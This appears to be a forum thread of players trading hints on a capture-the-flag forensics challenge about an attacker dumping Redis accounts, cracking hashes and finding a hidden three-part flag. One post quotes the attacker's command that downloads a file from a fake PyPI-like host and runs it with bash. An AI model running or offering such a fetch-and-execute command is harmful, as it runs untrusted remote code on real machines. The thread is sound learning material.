I found two of the three parts of the Flag, one of which was obfuscated in malware and the other in plain text. During the analysis, I noticed an excerpt that evidenced the attacker’s exploitation by “dump” user accounts from the Redis database, which can be easily found in Wireshark. Despite this, I still haven’t been able to locate the last part. Could someone give me some help?
5 Likes
I try by recovering the hash passwords
and try to see with the codes in the usernames
for now valid key
there are 10 valid hashes with hashcat
for the third part of the flag
part1: 3…
part2: c…
these are my suggestions for part three
if you have any suggestions
it would be very appreciated
It’s all enumeration and digging. You should notice some encoded text and a suspicious module. See if you’re able to reverse your current thought process and analyze that module somehow.
I’m in the same page, I tried for almost a day, 2/3 completed. Tried to get the last flag with hashcat but nothing works, maybe we are missing something… anyone can help us? I will really appreciated it.
I’m the same have 2/3. Does the last one have the do with the bulk string responses? Because I can’t find anyway to deserialize the Redis bulk strings.
Do you mean the encoded script? Downloaded with wget?
any hints for the third flag?
Okay so got 2/3 flags. Got the encryption and IV keys, but unable to find the ciphertext(?). Looking at at the “oldmem” but it seems to open a file? Doesn’t seem right for me. Any hints?
anything to do with the elf header of a packet or just gotta try and decrypt the message in one of the streams?
Can someone help me i think i found the third flag but don’t know how to decode, i think is the output of this command:
wget --no-check-certificate -O gezsdSC8i3 'https://files.pypi-install.com/packages/gezsdSC8i3' && bash gezsdSC8i3
I figure it out, if someone needs help DM me! 
sent you a dm